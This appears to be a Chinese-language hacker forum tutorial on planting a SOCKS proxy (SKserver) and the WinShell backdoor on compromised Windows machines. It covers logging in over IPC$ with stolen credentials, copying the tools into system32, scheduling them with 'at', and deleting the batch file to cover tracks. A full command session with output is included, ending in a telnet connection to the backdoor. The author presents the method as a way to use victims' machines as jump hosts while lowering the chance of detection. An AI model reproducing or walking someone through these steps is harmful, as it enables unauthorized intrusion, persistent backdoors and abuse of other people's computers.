|
先编辑好一个runsss.bat,内容如下:
sSocks -install (安装skserver) sSocks -config port 8384 (设置端口为8384) sSocks -config starttype 2 (设置启动类型为auto) net start skserver (启动skserver)
然后IPC$登陆到对方机器上 copy sSocks.exe \\255.255.255.255\admin$\system32 copy runsss.bat \\255.255.255.255\admin$\system32
(我觉得把 c$\windows\system32 改成 admin$\system32 更好些,因为对方不一定把系统装在C盘,目录名也不一定是windows,可能是winnt等等。)
然后 net time \\255.255.255.255 at \\255.255.255.255 时间 runsss.bat
时间一到执行完毕后,用QQ测试一下跳板确实能用了,就销毁证据 del \\255.255.255.255\admin$\system32\runsss.bat
然后退出IPC$就可以了
这么做就不用winshell了,步骤少一些减少被发现的几率,而且做好一个bat以后一劳永逸,还可用在别的机器上。适用于只想在肉鸡上做跳板,不想做其他事情的人,因为要做别的事还是需要telnet的。 班门弄斧了,别笑我啊,嘿嘿~~~~~~ 上面压缩包中有本文提到的两个软件
关于如何在自己的肉鸡上安装代理服务器 —— 风啸天
首先我们先对他进行速度上的测试,看看他的带宽大概是多少: —————————————————————————————————————— C:\Documents and Settings\风啸天>ping 255.255.255.255
Reply from 255.255.255.255: bytes=32 time=200ms TTL=111 Reply from 255.255.255.255: bytes=32 time=218ms TTL=111 Reply from 255.255.255.255: bytes=32 time=203ms TTL=111 Reply from 255.255.255.255: bytes=32 time=218ms TTL=111
Ping statistics for 255.255.255.255: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 200ms, Maximum = 218ms, Average = 209ms —————————————————————————————————————
非常不错,这台鸡的速度很好,我决定要了,呵呵~ 国外的能有这么快已经不错了,不会是传说中的夜光鸡吧?
—————————————————————————————————————
C:\Documents and Settings\风啸天>net use \\255.255.255.255\c$ ******* /user:******* 命令成功完成。
E:\网络工具包\WinShell>copy sserver.exe \\255.255.255.255\c$\windows\system32 已复制 1 个文件。
E:\网络工具包>copy sSocks.exe \\255.255.255.255\c$\windows\system32 已复制 1 个文件。
—————————————————————————————————————
不用我说大家也应该清楚了,我复制了两个文件到他的 SYSTEM32 目录 两个文件分别是 sServer.exe ( WinShell 后门程序 ) sSocks.exe ( SKserver 代理服务器程序 )
—————————————————————————————————————
C:\Documents and Settings\风啸天>net time \\255.255.255.255 \\255.255.255.255 的当前时间是 2002/8/15 上午 12:08
在 \\255.255.255.255 的本地时间 (GMT+09:00) 是 2002/8/15 上午 01:08
命令成功完成。
C:\Documents and Settings\风啸天>at \\255.255.255.255 1:10 c:\windows\system32\sserver.exe 新加了一项作业,其作业 ID = 1
C:\Documents and Settings\风啸天>at \\255.255.255.255 状态 ID 日期 时间 命令行 -------------------------------------------------------------------------- 1 今天 上午 01:10 c:\windows\system32\sserver.exe
————————————————————————————————————— 看过以前弱口令的都很清楚的明白,我们已经让他运行了指定的后门程序 —————————————————————————————————————
C:\Documents and Settings\风啸天>Telnet 255.255.255.255 1126
Welcome to Linleicd.com - ******
|